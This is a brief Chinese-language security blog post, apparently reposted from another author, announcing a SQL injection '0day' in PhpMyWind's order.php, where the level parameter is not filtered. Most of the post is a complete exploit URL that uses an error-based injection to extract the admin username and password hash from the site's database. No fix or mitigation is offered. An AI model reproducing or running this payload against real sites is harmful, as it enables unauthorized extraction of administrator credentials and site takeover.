PhpMyWind SQL Injection 的另一个0day

没穿底裤 2020年1月1日03:58:45评论397 views字数 411阅读1分22秒阅读模式
摘要

order.php第39行$sql = “SELECT * FROM `#@__cascadedata` WHERE level=$level And “;$level没有过滤

order.php第39行

$sql = “SELECT * FROM `#@__cascadedata` WHERE level=$level And “;$level没有过滤

直接提交
[php]
http://xxx.com/phpmywind/order.php?action=getarea&level=1%20%20or%20@`/’`=1%20and%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),0x7e,(substring((Select%20concat(username,0x7e,password)%20from%20`%23@__admin`),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%20and%20@`/’`=0%23[/php]

作者:lcx

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日03:58:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   PhpMyWind SQL Injection 的另一个0dayhttp://cn-sec.com/archives/75376.html

发表评论

匿名网友 填写信息